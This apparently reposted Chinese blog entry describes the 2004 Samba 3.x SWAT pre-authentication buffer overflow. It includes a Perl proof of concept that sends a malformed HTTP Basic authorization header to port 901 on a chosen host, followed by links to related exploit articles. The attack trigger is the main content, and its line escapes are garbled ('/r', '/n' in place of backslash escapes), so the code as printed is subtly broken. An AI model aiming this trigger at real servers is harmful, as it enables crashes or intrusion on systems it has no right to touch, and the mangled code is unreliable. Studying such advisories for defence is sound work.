Samba 3.x SWAT预验证远程缓冲区溢出漏洞[代码]

原创 2004年08月18日 18:10:00

受影响系统

Samba 3.0.2
               Samba 3.0.3
               Samba 3.0.4

详细描述
SWAT是Samba Web管理工具。

Samba SWAT服务预验证存在缓冲区溢出问题,远程攻击者可以利用这个漏洞在系统上以SWAT进程权限执行任意指令。问题存在于source/lib/util_str.c文件中的进行HTTP Basic验证的base64_decode_data_blob函数中.

测试代码
#!/usr/bin/perl
# Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow
# Created by Noam Rathaus of Beyond Security Ltd.
#

use IO::Socket;
use strict;

my $host = $ARGV[0];

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "901" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "connected/n";

$remote->autoflush(1);

my $http = "GET / HTTP/1.1/r
Host: $host:901/r
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 Firefox/0.9.1/r
Accept: text/xml/r
Accept-Language: en-us,en;q=0.5/r
Accept-Encoding: gzip,deflate/r
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7/r
Keep-Alive: 300/r
Connection: keep-alive/r
Authorization: Basic =/r
/r
";

print "HTTP: [$http]/n";
print $remote $http;
sleep(1);
print "Sent/n";

while (<$remote>)
{
print $_;
}
print "/n";

close $remote;

Samba远程崩溃或代码执行漏洞(CVE-2015-0240)简要分析

Samba远程崩溃或代码执行漏洞(CVE-2015-0240)1.搭建samba环境注意:在Linux系统上使用源码编译来安装samba必须要将系统自带的全部关于samba的软件均删除,可用如下命令查...
  • wuyangbotianshi
  • wuyangbotianshi
  • 2015年03月07日 00:17
  • 2148

Samba CVE-2015-0240 远程代码执行漏洞利用实践

在大家欢天喜地度春节时,安全界近日爆出Samba被发现存在远程命令执行漏洞(CVE-2015-0240),安全脉搏有文章《 Samba全系版本远程命令执行漏洞(CVE-2015-0240)检测方法及...
  • qq_27446553
  • qq_27446553
  • 2015年04月27日 09:04
  • 1483

缓冲区溢出漏洞

缓冲区溢出的根本原因是冯洛伊曼体系的计算机并不严格的区分代码段和数据段,只是简单的根据eip的指向来决定哪些是代码,所以缓冲区溢出攻击都会通过某种方式修改eip的值,让其指向恶意代码。缓冲区溢出攻击一...
  • lanuage
  • lanuage
  • 2016年10月31日 19:47
  • 1648

缓冲区溢出漏洞的预防

由于缓冲区滋出漏洞非常广泛.如何防止其造成系统安全性下降也就成为了人们的重要研究对象。事实上.有大量的方法可以在一定程度L减少或者防止特定的缓冲区滋出漏洞 出现.这些方法包括程序语ii、编译器、运行...
  • ljuyx010
  • ljuyx010
  • 2013年03月28日 14:42
  • 579

缓冲区溢出攻击原理分析

本文从C/C++语言的函数帧结构出发,分析缓冲溢出攻击如果修改eip进而控制执执行shellcode。...
  • linyt
  • linyt
  • 2015年01月30日 22:30
  • 7767

缓冲区溢出分析第11课:整数溢出的原理

《缓冲区溢出分析》这一系列的内容是我为“i春秋”(www.ichunqiu.com)所录制的同名视频课程的讲稿汇总。每次我都是在写完课程的文档后,再依据文档内容进行课程的讲解。而本系列的内容也是从零开...
  • ioio_jy
  • ioio_jy
  • 2016年04月12日 11:34
  • 6299

安全测试之缓冲区溢出(BO)

一、缓冲区溢出的概念BO的概念很简单,就是你申请了一点内存,而你填入的数据超过了内容的大小,这样你填入的数据就会占用其他的内容,这种情况就是缓冲区溢出。void copy(char* info) { ...
  • quiet_girl
  • quiet_girl
  • 2016年02月02日 15:32
  • 1443

缓冲区溢出漏洞攻击——Shellcode编写

一、实验内容利用一个程序漏洞,编写shellcode,达成效果:蹦出对话框,显示“You have been hacked!(by JWM)”二、实验原理因为输入了过长的字符,而缓冲区本身又没有有效的...
  • pianogirl123
  • pianogirl123
  • 2016年12月19日 20:53
  • 1225

网站漏洞整理

1,xss Cross Site Script 恶意攻击者在某web页面植入恶意的html代码,当用户浏览该页面时,恶意的html代码会被执行,从而达到恶意用户的特殊目的, 比如窃取用户的用户名...
  • u013393981
  • u013393981
  • 2014年09月08日 18:22
  • 1423

验证本地缓冲区溢出漏洞攻击

Info:本篇主要是为了验证本地缓冲区溢出,这是理解缓冲区溢出攻击的第一步,有了这一步,才能更深刻的理解到什么是缓冲区漏洞攻击,从而对以后的学习奠定一定的基础(注意:以下请在linux环境下实验) 基...
  • wingStudio_zongheng
  • wingStudio_zongheng
  • 2016年10月30日 19:03
  • 1712
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:Samba 3.x SWAT预验证远程缓冲区溢出漏洞[代码]
举报原因:
原因补充:

(最多只允许输入30个字)